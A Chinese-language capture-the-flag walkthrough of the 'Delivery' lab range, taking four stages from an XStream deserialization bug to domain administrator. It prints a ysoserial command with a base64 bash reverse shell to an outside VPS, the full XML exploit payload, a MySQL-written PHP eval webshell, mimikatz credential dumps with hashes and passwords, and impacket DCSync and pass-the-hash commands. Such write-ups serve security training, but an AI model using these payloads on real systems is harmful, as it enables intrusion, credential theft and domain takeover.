春秋云镜Delivery

开题：39.98.119.38

第一关

请测试 Delivery 暴露在公网上的 Web 应用的安全性，并尝试获取在该服务器上执行任意命令的能力。

fscan扫一下

[+] 端口开放 39.98.119.38:80
[+] 端口开放 39.98.119.38:21
[+] 端口开放 39.98.119.38:22
[+] 端口开放 39.98.119.38:8080
[*] 网站标题 http://39.98.119.38       状态码:200 长度:10918  标题:Apache2 Ubuntu Default Page: It works
[+] ftp 39.98.119.38:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] 网站标题 http://39.98.119.38:8080  状态码:200 长度:3655   标题:公司发货单

ftp匿名登录，下载pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

访问8080

vps开放1099端口，然后yso起服务

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzguMTM0LjE0OS4yNC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"

监听2333端口

nc -lvvp 2333

yakit发包

POST /just_sumbit_it HTTP/1.1
Host: 39.98.119.38:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/xml


<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>8.134.149.24</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>8.134.149.24</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

直接拿下root

第二关

为了实现跨机器和跨操作系统的文件共享，管理员在内网部署了 NFS，然而这个决策却使得该服务器陷入了潜在的安全风险。你的任务是尝试获取该服务器的控制权，以评估安全性。

搭代理，扫内网

[+] 端口开放 172.22.13.57:80
[+] 端口开放 172.22.13.57:22
[+] 端口开放 172.22.13.14:80
[+] 端口开放 172.22.13.14:22
[+] 端口开放 172.22.13.14:21
[+] 端口开放 172.22.13.28:80
[+] 端口开放 172.22.13.6:88
[+] 端口开放 172.22.13.28:3306
[+] 端口开放 172.22.13.6:445
[+] 端口开放 172.22.13.28:445
[+] 端口开放 172.22.13.28:139
[+] 端口开放 172.22.13.6:139
[+] 端口开放 172.22.13.28:135
[+] 端口开放 172.22.13.6:135
[+] 端口开放 172.22.13.28:8000
[+] 端口开放 172.22.13.14:8080
[*] NetBios 172.22.13.6     [+] DC:XIAORANG\WIN-DC         
[*] 网站标题 http://172.22.13.57       状态码:200 长度:4833   标题:Welcome to CentOS
[*] NetInfo
[*] 172.22.13.28
   [->] WIN-HAUWOLAO
   [->] 172.22.13.28
[*] 网站标题 http://172.22.13.28       状态码:200 长度:2525   标题:欢迎登录OA办公平台
[*] 网站标题 http://172.22.13.14       状态码:200 长度:10918  标题:Apache2 Ubuntu Default Page: It works
[*] NetInfo
[*] 172.22.13.6
   [->] WIN-DC
   [->] 172.22.13.6
[*] 网站标题 http://172.22.13.28:8000  状态码:200 长度:170    标题:Nothing Here.
[*] 网站标题 http://172.22.13.14:8080  状态码:200 长度:3655   标题:公司发货单
[+] ftp 172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393
[+] MySQL 172.22.13.28:3306:root 123456

整理一下

172.22.13.14 本机
172.22.13.57 CentOS
172.22.13.28 OA系统、mysql弱口令root/123456
172.22.13.6  WIN-DC DC域 

看提示是要打nfs，那再扫一下2049端口

选择先ssh到外网主机,然后下载一个mount,在挂载到外网主机,写ssh公钥给joyce用户nfs-common offline installer for ubuntu 20.04.5 LTS · GitHub

靶机上创建run.sh

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb

挂载到tmp目录

mount -t nfs 172.22.13.57:/home/joyce tmp

df -h查看，挂在成功

接下来写公钥 ，ssh连接

ssh-keygen -t rsa -b 4096
cd /tmp
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /tmp/.ssh/authorized_keys

根目录发现一个密码，flag权限不够

xiaorang.lab/zhangwen\QT62f3gBhK1

然后再看看ftpftp | GTFOBins

外网主机

python3 -m pyftpdlib -p 8888 -u test -P test -w 

joyce

拿到flag2和hint

第三关

请尝试获取内网中运行 OA 系统的服务器权限，并获取该服务器上的机密文件。

开始打数据库，navicat连接

查看有无写入权限

show variables like "secure_file_priv";

结果为空说明有写入权限

查找插件路径

show variables like "%plugin%";

直接写webshell到C:\phpstudy_pro\www

select "<?php eval($_POST[1]);phpinfo();?>" into outfile "C:\\phpstudy_pro\\www\\shell.php";

蚁剑连接拿flag

第四关

由于域管理员错误的配置，导致域内某个用户拥有危险的 DACL。你的任务是找到该用户，并评估这个配置错误所带来的潜在危害。

先新建个用户rdp上去方便以管理员身份操作

rdp上去，传猕猴桃抓哈希

privilege::debug
sekurlsa::logonpasswords

发现一个用户

* Username : chenglei
* Domain   : XIAORANG
* NTLM     : 0c00801c30594a1b8eaa889d237c5382
* SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI    : 89b179dc738db098372c365602b7b0f4

* Username : chenglei
* Domain   : XIAORANG.LAB
* Password : Xt61f3LBhg1

查看chenglei用户的权限

是ACL Admin组内成员也就是说chenglei用户有WriteDacl权限，所以说可以像exchange那样打：我们直接给自己dsync权限，然后就可以dump到域管哈希了

加权限

proxychains -q impacket-dacledit xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6

dump哈希

proxychains -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@WIN-DC.xiaorang.lab -target-ip 172.22.13.6 -just-dc-ntlm -history -user-status

PTH

proxychains -q crackmapexec smb 172.22.13.6 -u administrator -H6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"